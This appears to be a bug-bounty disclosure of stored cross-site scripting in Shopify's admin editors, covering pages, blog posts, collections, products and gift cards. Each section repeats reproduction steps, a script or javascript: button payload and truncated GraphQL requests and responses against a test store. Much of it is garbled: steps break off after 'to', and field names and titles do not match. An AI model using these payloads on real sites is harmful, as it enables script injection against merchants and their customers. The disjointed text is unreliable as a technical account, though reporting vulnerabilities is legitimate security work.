Correspondence from Shopify declined to comment regarding new discovered vulnerabilities within their website. Although 'frontend' vulnerabilities are considered out of scope, person/tester foundhimself a beefy bugbounty from the same page that has been listed below, including similar functionality that has not been tested yet. Two emails and several reports, the 'hacker-1' staff reject the bid for findings. Online Store -> Pages -> Add Page -> Title -> Title_Name -> Content -> Paste Payload -> -> Show HTML -> Fix HTML encoding of tags from <script src=1 href=1 onerror="javascript:alert(1)"></script> 1. Browse to Online Store 2. Select Pages -> Add Page 3. Set Title -> Title_Name 4. Set Content -> Paste Payload -> 5. Select Show HTML 6. Fix HTML encoding of tags <script src=1 href=1 onerror="javascript:alert(1)"></script> // HTTP POST request showing XSS payload POST /admin/online-store/admin/api/unversioned/graphql?operation=PageUpdate HTTP/2 Host: test-img-src-x-onerror-alert1-test.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] "page":{"bodyHtml":"" [...] // HTTP response HTTP/2 200 OK Content-Type: application/json; charset=utf-8 [...] [...] page":{"id":"gid://shopify/OnlineStorePage/...","body":"\n\ntest","title":"Title_Name" [...] Online Store -> Blog Posts -> Add Blog Post -> Title -> Blog_Title -> Content -> Paste Payload ->
-> Show HTML -> Fix HTML encoding of tags from

<form><button formaction="javascript:javascript:alert(1)">X</button></form>

to

1. Browse to Online Store 2. Select Blog Posts -> Add Blog Post 3. Set Title -> Blog_Title 4. Set Content -> Paste Payload -> 5. Select Show HTML 6. Fix HTML encoding of tags <script src=1 href=1 onerror="javascript:alert(1)"></script> // HTTP POST request showing XSS payload POST /admin/online-store/admin/api/unversioned/graphql?operation=ArticleUpdate HTTP/2 Host: test-img-src-x-onerror-alert1-test.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] "article":{"blogId":"gid://shopify/OnlineStoreBlog/...","body":"" [...] // HTTP response showing unsanitized payload HTTP/2 200 OK Content-Type: application/json; charset=utf-8 [...] [...] "article":{"id":"gid://shopify/OnlineStoreArticle/...","title":"Blog_Title","body":"\n","handle":"blog_title-2" [...] Products -> Collections -> Create Collection -> Title -> Product_Title -> Description -> Paste Payload ->
-> Show HTML -> Fix HTML encoding of tags from

<form><button formaction="javascript:javascript:alert(1)">X</button></form>

to

1. Browse to Products 2. Select Collections -> Create Collection 3. Set Title -> Collection_Title 4. Set Content -> Paste Payload -> 5. Select Show HTML 6. Fix HTML encoding of tags <script src=1 href=1 onerror="javascript:alert(1)"></script> // HTTP POST request showing XSS payload POST /admin/internal/web/graphql/core?operation=CreateCollection&type=mutation HTTP/2 Host: test-img-src-x-onerror-alert1-test.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] "collection":{"title":"Collection_Title","descriptionHtml":"" [...] // HTTP response showing unsanitized payload HTTP/2 200 OK Content-Type: application/json; charset=utf-8 [...] [...] "collection":{"id":"gid://shopify/Collection/...","title":"Collection_Title","descriptionHtml":"" [...] Products -> Inventory -> View Products -> Double Click on Product -> Title -> Inventory_Title -> Description -> Paste Payload ->
-> Show HTML -> Fix HTML encoding of tags from

<form><button formaction="javascript:javascript:alert(1)">X</button></form>

to

1. Browse to Products 2. Select Inventory-> View Products 3. Select Product -> Title -> Product_Title 4. Set Description -> Paste Payload -> 5. Select Show HTML 6. Fix HTML encoding of tags <script src=1 href=1 onerror="javascript:alert(1)"></script> // HTTP POST request showing XSS payload POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation HTTP/2 Host: test-img-src-x-onerror-alert1-test.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] "product":{"descriptionHtml":"","workflow":"product-details-update" [...] // HTTP response showing unsanitized payload HTTP/2 200 OK Content-Type: application/json; charset=utf-8 [...] [...] "product":{"id":"gid://shopify/Product/...","title":"Product_Title","handle":"product_title","descriptionHtml":"" [...] Products -> Add Product -> Title -> Product_Title -> Description -> Paste Payload ->
-> Show HTML -> Fix HTML encoding of tags from

<form><button formaction="javascript:javascript:alert(1)">X</button></form>

to

1. Browse to Products 2. Add Product -> Title -> Product_Title 3. Set Description -> Paste Payload -> 4. Select Show HTML 5. Fix HTML encoding of tags <script src=1 href=1 onerror="javascript:alert(1)"></script> // HTTP POST request showing XSS payload POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation HTTP/2 Host: test-img-src-x-onerror-alert1-test.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] "product":{"descriptionHtml":"

 

...\">\n" [...] // HTTP response showing unsanitized payload HTTP/2 200 OK Content-Type: application/json; charset=utf-8 [...] [...] "title":"Gift_Title",">\n", [...] Products -> Gift Cards -> Add Gift Card Products -> Gift_Title -> Paste Payload ->
-> Show HTML -> Fix HTML encoding of tags from

<form><button formaction="javascript:javascript:alert(1)">X</button></form>

to

1. Browse to Products 2. Select Gift Cards 3. Add Gift Card Products -> Gift_Title 4. Set Description -> Paste Payload -> 5. Select Show HTML 6. Fix HTML encoding of tags <script src=1 href=1 onerror="javascript:alert(1)"></script> // HTTP POST request showing XSS payload POST /admin/internal/web/graphql/core?operation=CreateProduct&type=mutation HTTP/2 Host: test-img-src-x-onerror-alert1-test.myshopify.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 [...] [...] "product":{"title":"Gift_Title","descriptionHtml":"" [...] // HTTP response showing unsanitized payload HTTP/2 200 OK Content-Type: application/json; charset=utf-8 [...] [...] "title":"Gift_Title","handle":"gift_title-1","descriptionHtml":"" [...] 1. Browse to /admin/pages 2. Template -> Add Section -> Contact Form -> Heading -> XSS Payload 3. Online Store -> Pages -> Add Page ->
https://test-img-src-x-onerror-alert1-test.myshopify.com/admin/settings/notifications